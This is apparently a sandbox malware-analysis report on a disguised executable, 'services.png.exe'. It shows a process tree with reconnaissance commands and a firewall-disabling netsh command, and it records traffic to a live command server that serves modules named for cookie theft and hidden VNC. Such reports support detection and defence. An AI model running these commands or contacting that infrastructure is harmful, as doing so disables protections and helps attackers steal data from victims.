Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    31/01/2025, 10:03 UTC

General

  • Target

    services.png.exe

  • Size

    264KB

  • MD5

    d397a1de162f332782fe3205a07792dd

  • SHA1

    44793b3a374c3cb453bbd87a2fd28d8a4c408002

  • SHA256

    ea251bf7fcc0a42cb9e954a45d925ef379ef1ffca39e482f44af701b4ace8560

  • SHA512

    6be10fc6ebabffadd89a72862c5d292e2939d165298019fe684de4efb3284603756c8764810835c12651ad49f608dd3345c8d778b7fd795683f0fcceeaa3f659

  • SSDEEP

    6144:VtjNiEZdoTD3wad4eq5OxUatA04d0drsFp2A4AG5uU:VTdS3Uek0WchA2D

Malware Config

Signatures

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
      PID:1088
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
        PID:1168
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
          PID:1192
          • C:\Users\Admin\AppData\Local\Temp\services.png.exe
            "C:\Users\Admin\AppData\Local\Temp\services.png.exe"
            2⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2680
            • C:\Users\Admin\AppData\Roaming\Hearirigdibe\ubahwoura.exe
              "C:\Users\Admin\AppData\Roaming\Hearirigdibe\ubahwoura.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2700
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2040
                • C:\Windows\SysWOW64\HOSTNAME.EXE
                  hostname
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1044
                • C:\Windows\SysWOW64\ipconfig.exe
                  ipconfig /all
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Gathers network information
                  PID:2876
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  5⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2900
                • C:\Windows\SysWOW64\netsh.exe
                  netsh firewall set opmode disable
                  5⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:112
                • C:\Windows\SysWOW64\net.exe
                  net share
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1736
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 share
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:1868
        • C:\Windows\system32\DllHost.exe
          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
          1⤵
            PID:1440
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
            1⤵
              PID:2556

Network

  • flag-us
    DNS
    saba.royalreturns.org
    ubahwoura.exe
    Remote address:
    8.8.8.8:53
    Request
    saba.royalreturns.org
    IN A
    Response
    saba.royalreturns.org
    IN A
    212.224.93.93
  • flag-de
    POST
    https://saba.royalreturns.org/file.php
    ubahwoura.exe
    Remote address:
    212.224.93.93:443
    Request
    POST /file.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: saba.royalreturns.org
    Content-Length: 142
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 31 Jan 2025 10:03:26 GMT
    Content-Type: application/octet-stream
    Content-Length: 174876
    Connection: keep-alive
    Cache-Control: public
    Content-Disposition: attachment; filename="%2e/files/atmos_video.module"
    Content-Transfer-Encoding: binary
    Strict-Transport-Security: max-age=31536000;
  • flag-de
    POST
    https://saba.royalreturns.org/file.php
    ubahwoura.exe
    Remote address:
    212.224.93.93:443
    Request
    POST /file.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: saba.royalreturns.org
    Content-Length: 130
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 31 Jan 2025 10:03:27 GMT
    Content-Type: application/octet-stream
    Content-Length: 14064
    Connection: keep-alive
    Cache-Control: public
    Content-Disposition: attachment; filename="%2e/files/us.xml"
    Content-Transfer-Encoding: binary
    Strict-Transport-Security: max-age=31536000;
  • flag-de
    POST
    https://saba.royalreturns.org/file.php
    ubahwoura.exe
    Remote address:
    212.224.93.93:443
    Request
    POST /file.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: saba.royalreturns.org
    Content-Length: 145
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 31 Jan 2025 10:03:27 GMT
    Content-Type: application/octet-stream
    Content-Length: 221468
    Connection: keep-alive
    Cache-Control: public
    Content-Disposition: attachment; filename="%2e/files/atmos_ffcookie.module"
    Content-Transfer-Encoding: binary
    Strict-Transport-Security: max-age=31536000;
  • flag-de
    POST
    https://saba.royalreturns.org/file.php
    ubahwoura.exe
    Remote address:
    212.224.93.93:443
    Request
    POST /file.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: saba.royalreturns.org
    Content-Length: 141
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 31 Jan 2025 10:03:27 GMT
    Content-Type: application/octet-stream
    Content-Length: 225052
    Connection: keep-alive
    Cache-Control: public
    Content-Disposition: attachment; filename="%2e/files/atmos_hvnc.module"
    Content-Transfer-Encoding: binary
    Strict-Transport-Security: max-age=31536000;
  • flag-us
    DNS
    www.google.com
    ubahwoura.exe
    Remote address:
    8.8.8.8:53
    Request
    www.google.com
    IN A
    Response
    www.google.com
    IN A
    216.58.213.4
  • flag-gb
    GET
    http://www.google.com/webhp
    ubahwoura.exe
    Remote address:
    216.58.213.4:80
    Request
    GET /webhp HTTP/1.1
    Accept: */*
    Connection: Close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: www.google.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 302 Found
    Location: http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGIzA8rwGIjD0cNxUVEcL6jSnosSz7v4YEThk48oeXrktazejmPbolcCE6UkyHI7lnGEBQm3PGCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    x-hallmonitor-challenge: CgwIjMDyvAYQs6mHtwMSBLXXsFM
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-PfQoX0KsuRhbLyIpar3dQg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    Date: Fri, 31 Jan 2025 10:03:56 GMT
    Server: gws
    Content-Length: 401
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AVcja2fRrb1ofdOAl0BBs_SmqCZD9kuFfk_uzu1d8Cbso7tuxcFSq3WPvg; expires=Wed, 30-Jul-2025 10:03:56 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
    Connection: close
  • flag-gb
    GET
    http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGIzA8rwGIjD0cNxUVEcL6jSnosSz7v4YEThk48oeXrktazejmPbolcCE6UkyHI7lnGEBQm3PGCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    ubahwoura.exe
    Remote address:
    216.58.213.4:80
    Request
    GET /sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGIzA8rwGIjD0cNxUVEcL6jSnosSz7v4YEThk48oeXrktazejmPbolcCE6UkyHI7lnGEBQm3PGCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: www.google.com
    Cache-Control: no-cache
    Connection: Close
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Fri, 31 Jan 2025 10:03:56 GMT
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Content-Type: text/html
    Server: HTTP server (unknown)
    Content-Length: 3090
    X-XSS-Protection: 0
    Connection: close
  • flag-gb
    GET
    http://www.google.com/webhp
    ubahwoura.exe
    Remote address:
    216.58.213.4:80
    Request
    GET /webhp HTTP/1.1
    Accept: */*
    Connection: Close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: www.google.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 302 Found
    Location: http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGI3A8rwGIjCC1uaxylR74etMVEcjMLXESH01-s7QSPYnm1Y2M8DuX3AfLzWZ970plntqfIYIu_UyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    x-hallmonitor-challenge: CgwIjcDyvAYQ8tO5uAESBLXXsFM
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-vhISdd4ZbDLt4B2A27s7rA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    Date: Fri, 31 Jan 2025 10:03:57 GMT
    Server: gws
    Content-Length: 401
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AVcja2dFBlNdNem3ZinIVzBPoXQLpYzlThiGuvmQwxc-k7rq0_7ql_L7ww; expires=Wed, 30-Jul-2025 10:03:57 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
    Connection: close
  • flag-us
    DNS
    crl.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    crl.microsoft.com
    IN A
    Response
    crl.microsoft.com
    IN CNAME
    crl.www.ms.akadns.net
    crl.www.ms.akadns.net
    IN CNAME
    a1363.dscg.akamai.net
    a1363.dscg.akamai.net
    IN A
    2.19.252.157
    a1363.dscg.akamai.net
    IN A
    2.19.252.143
  • flag-gb
    GET
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    Remote address:
    2.19.252.157:80
    Request
    GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: crl.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1036
    Content-Type: application/octet-stream
    Content-MD5: +oTkvMkqpdtzWrUHEQQM3g==
    Last-Modified: Thu, 12 Dec 2024 00:06:56 GMT
    ETag: 0x8DD1A40E476D877
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 4de8ec0b-c01e-0047-3936-4c3cb1000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Fri, 31 Jan 2025 10:03:57 GMT
    Connection: keep-alive
  • flag-us
    DNS
    www.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    www.microsoft.com
    IN A
    Response
    www.microsoft.com
    IN CNAME
    www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net
    IN CNAME
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    IN CNAME
    e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net
    IN A
    95.100.245.144
  • flag-gb
    GET
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    Remote address:
    95.100.245.144:80
    Request
    GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: www.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1078
    Content-Type: application/octet-stream
    Content-MD5: HqJzZuA065RHozzmOcAUiQ==
    Last-Modified: Tue, 14 Jan 2025 20:41:31 GMT
    ETag: 0x8DD34DBD43549F4
    x-ms-request-id: 6a4411aa-c01e-0068-30c9-66317a000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Fri, 31 Jan 2025 10:03:57 GMT
    Connection: keep-alive
    TLS_version: UNKNOWN
    ms-cv: CASMicrosoftCV1a53f8e5.0
    ms-cv-esi: CASMicrosoftCV1a53f8e5.0
    X-RTag: RT
  • flag-gb
    GET
    http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGI3A8rwGIjCC1uaxylR74etMVEcjMLXESH01-s7QSPYnm1Y2M8DuX3AfLzWZ970plntqfIYIu_UyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    ubahwoura.exe
    Remote address:
    216.58.213.4:80
    Request
    GET /sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGI3A8rwGIjCC1uaxylR74etMVEcjMLXESH01-s7QSPYnm1Y2M8DuX3AfLzWZ970plntqfIYIu_UyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: www.google.com
    Cache-Control: no-cache
    Connection: Close
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Fri, 31 Jan 2025 10:03:57 GMT
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Content-Type: text/html
    Server: HTTP server (unknown)
    Content-Length: 3090
    X-XSS-Protection: 0
    Connection: close
  • flag-de
    POST
    https://saba.royalreturns.org/gate.php
    ubahwoura.exe
    Remote address:
    212.224.93.93:443
    Request
    POST /gate.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: saba.royalreturns.org
    Content-Length: 440
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 31 Jan 2025 10:03:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Vary: Accept-Encoding
    Strict-Transport-Security: max-age=31536000;
  • 212.224.93.93:443
    https://saba.royalreturns.org/file.php
    tls, http
    ubahwoura.exe
    4.7kB
    192.8kB
    84
    144
    HTTP Request: POST https://saba.royalreturns.org/file.php
    HTTP Response: 200
  • 212.224.93.93:443
    https://saba.royalreturns.org/file.php
    tls, http
    ubahwoura.exe
    1.8kB
    20.0kB
    17
    20
    HTTP Request: POST https://saba.royalreturns.org/file.php
    HTTP Response: 200
  • 212.224.93.93:443
    https://saba.royalreturns.org/file.php
    tls, http
    ubahwoura.exe
    5.3kB
    239.1kB
    97
    182
    HTTP Request: POST https://saba.royalreturns.org/file.php
    HTTP Response: 200
  • 212.224.93.93:443
    https://saba.royalreturns.org/file.php
    tls, http
    ubahwoura.exe
    5.2kB
    242.8kB
    96
    182
    HTTP Request: POST https://saba.royalreturns.org/file.php
    HTTP Response: 200
  • 216.58.213.4:80
    http://www.google.com/webhp
    http
    ubahwoura.exe
    536 B
    1.5kB
    5
    5
    HTTP Request: GET http://www.google.com/webhp
    HTTP Response: 302
  • 216.58.213.4:80
    http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGIzA8rwGIjD0cNxUVEcL6jSnosSz7v4YEThk48oeXrktazejmPbolcCE6UkyHI7lnGEBQm3PGCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    http
    ubahwoura.exe
    847 B
    3.7kB
    8
    7
    HTTP Request: GET http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGIzA8rwGIjD0cNxUVEcL6jSnosSz7v4YEThk48oeXrktazejmPbolcCE6UkyHI7lnGEBQm3PGCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    HTTP Response: 429
  • 216.58.213.4:80
    http://www.google.com/webhp
    http
    ubahwoura.exe
    536 B
    1.5kB
    5
    5
    HTTP Request: GET http://www.google.com/webhp
    HTTP Response: 302
  • 2.19.252.157:80
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    http
    399 B
    1.7kB
    4
    4
    HTTP Request: GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    HTTP Response: 200
  • 95.100.245.144:80
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    http
    393 B
    1.7kB
    4
    4
    HTTP Request: GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    HTTP Response: 200
  • 216.58.213.4:80
    http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGI3A8rwGIjCC1uaxylR74etMVEcjMLXESH01-s7QSPYnm1Y2M8DuX3AfLzWZ970plntqfIYIu_UyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    http
    ubahwoura.exe
    847 B
    3.7kB
    8
    7
    HTTP Request: GET http://www.google.com/sorry/index?continue=http://www.google.com/webhp&q=EgS117BTGI3A8rwGIjCC1uaxylR74etMVEcjMLXESH01-s7QSPYnm1Y2M8DuX3AfLzWZ970plntqfIYIu_UyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    HTTP Response: 429
  • 212.224.93.93:443
    https://saba.royalreturns.org/gate.php
    tls, http
    ubahwoura.exe
    1.8kB
    1.7kB
    14
    12
    HTTP Request: POST https://saba.royalreturns.org/gate.php
    HTTP Response: 200
  • 8.8.8.8:53
    saba.royalreturns.org
    dns
    ubahwoura.exe
    67 B
    83 B
    1
    1
    DNS Request: saba.royalreturns.org
    DNS Response: 212.224.93.93
  • 8.8.8.8:53
    www.google.com
    dns
    ubahwoura.exe
    60 B
    76 B
    1
    1
    DNS Request: www.google.com
    DNS Response: 216.58.213.4
  • 8.8.8.8:53
    crl.microsoft.com
    dns
    63 B
    162 B
    1
    1
    DNS Request: crl.microsoft.com
    DNS Response: 2.19.252.157, 2.19.252.143
  • 8.8.8.8:53
    www.microsoft.com
    dns
    63 B
    230 B
    1
    1
    DNS Request: www.microsoft.com
    DNS Response: 95.100.245.144

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Roaming\Conoraloatge\atkodykiz.eba
    Filesize: 606KB
    MD5: 78f5d59f7b55a7c13a85059afc9f1f07
    SHA1: b4a9d09e71d09f2d0ce5609cd702560e0b8a53e3
    SHA256: 1c6a6bf6d2d0f5a09f6d22af3e03948619115bcf816636fa2dbcc11d188ff358
    SHA512: a6639b421d3f7196e27b15b7e8d5aad6ac4098392a7d4906df8b551ef3fc50605c50c855f7b83415b06607e21a53ed186cadd9734536b2bbf486bbde32298c41
  • \Users\Admin\AppData\Local\Temp\tmp7D5A.tmp
    Filesize: 1.2MB
    MD5: d124f55b9393c976963407dff51ffa79
    SHA1: 2c7bbedd79791bfb866898c85b504186db610b5d
    SHA256: ea1e16247c848c8c171c4cd1fa17bc5a018a1fcb0c0dac25009066b6667b8eef
    SHA512: 278fe3a4b1fbbe700e4f4483b610133e975e36e101455661d5197bd892a68839b9d555499040d200c92aefa9e3819380e395c0cd85d5fc845c6364d128a8cf06
  • \Users\Admin\AppData\Local\Temp\tmp7D7A.tmp
    Filesize: 1.1MB
    MD5: 9b98d47916ead4f69ef51b56b0c2323c
    SHA1: 290a80b4ded0efc0fd00816f373fcea81a521330
    SHA256: 96e0ae104c9662d0d20fdf59844c2d18334e5847b6c4fc7f8ce4b3b87f39887b
    SHA512: 68b67021f228d8d71df4deb0b6388558b2f935a6aa466a12199cd37ada47ee588ea407b278d190d3a498b0ef3f5f1a2573a469b7ea5561ab2e7055c45565fe94
  • \Users\Admin\AppData\Roaming\Hearirigdibe\ubahwoura.exe
    Filesize: 264KB
    MD5: 8c075d92c320965ac0acf9aef9d87def
    SHA1: 4d4f17a7075890303847a03535e852293bbbd24e
    SHA256: daaba63cc784e035425b47e0ced975101fcd25646d36e585a893c6b49a69cb76
    SHA512: 2929dcea8492d15457539cc57f43f9306652fd4c90b6e97915a565006447c0167b13f2f2c680d850c9c9b9319a5868b743b6ed1774bd06ec5b17bd8e804b27a1
  • memory/1088-39-0x0000000000220000-0x0000000000267000-memory.dmp
    Filesize: 284KB
  • memory/1088-36-0x0000000000220000-0x0000000000267000-memory.dmp
    Filesize: 284KB
  • memory/1088-34-0x0000000000220000-0x0000000000267000-memory.dmp
    Filesize: 284KB
  • memory/1088-37-0x0000000000220000-0x0000000000267000-memory.dmp
    Filesize: 284KB
  • memory/1088-38-0x0000000000220000-0x0000000000267000-memory.dmp
    Filesize: 284KB
  • memory/1168-48-0x0000000001F90000-0x0000000001FD7000-memory.dmp
    Filesize: 284KB
  • memory/1168-42-0x0000000001F90000-0x0000000001FD7000-memory.dmp
    Filesize: 284KB
  • memory/1168-44-0x0000000001F90000-0x0000000001FD7000-memory.dmp
    Filesize: 284KB
  • memory/1168-46-0x0000000001F90000-0x0000000001FD7000-memory.dmp
    Filesize: 284KB
  • memory/1192-54-0x0000000002EC0000-0x0000000002F07000-memory.dmp
    Filesize: 284KB
  • memory/1192-53-0x0000000002EC0000-0x0000000002F07000-memory.dmp
    Filesize: 284KB
  • memory/1192-51-0x0000000002EC0000-0x0000000002F07000-memory.dmp
    Filesize: 284KB
  • memory/1192-52-0x0000000002EC0000-0x0000000002F07000-memory.dmp
    Filesize: 284KB
  • memory/1440-59-0x0000000001ED0000-0x0000000001F17000-memory.dmp
    Filesize: 284KB
  • memory/1440-61-0x0000000001ED0000-0x0000000001F17000-memory.dmp
    Filesize: 284KB
  • memory/1440-63-0x0000000001ED0000-0x0000000001F17000-memory.dmp
    Filesize: 284KB
  • memory/1440-57-0x0000000001ED0000-0x0000000001F17000-memory.dmp
    Filesize: 284KB
  • memory/2556-105-0x0000000000440000-0x0000000000487000-memory.dmp
    Filesize: 284KB
  • memory/2556-103-0x0000000000440000-0x0000000000487000-memory.dmp
    Filesize: 284KB
  • memory/2556-107-0x0000000000440000-0x0000000000487000-memory.dmp
    Filesize: 284KB
  • memory/2556-109-0x0000000000440000-0x0000000000487000-memory.dmp
    Filesize: 284KB
  • memory/2680-67-0x00000000024A0000-0x00000000024E7000-memory.dmp
    Filesize: 284KB
  • memory/2680-71-0x00000000024A0000-0x00000000024E7000-memory.dmp
    Filesize: 284KB
  • memory/2680-2-0x0000000000270000-0x0000000000271000-memory.dmp
    Filesize: 4KB
  • memory/2680-4-0x0000000000270000-0x0000000000271000-memory.dmp
    Filesize: 4KB
  • memory/2680-69-0x00000000024A0000-0x00000000024E7000-memory.dmp
    Filesize: 284KB
  • memory/2680-0-0x0000000000400000-0x0000000000447000-memory.dmp
    Filesize: 284KB
  • memory/2680-75-0x00000000024A0000-0x00000000024E7000-memory.dmp
    Filesize: 284KB
  • memory/2680-73-0x00000000024A0000-0x00000000024E7000-memory.dmp
    Filesize: 284KB
  • memory/2680-1-0x0000000000400000-0x0000000000447000-memory.dmp
    Filesize: 284KB
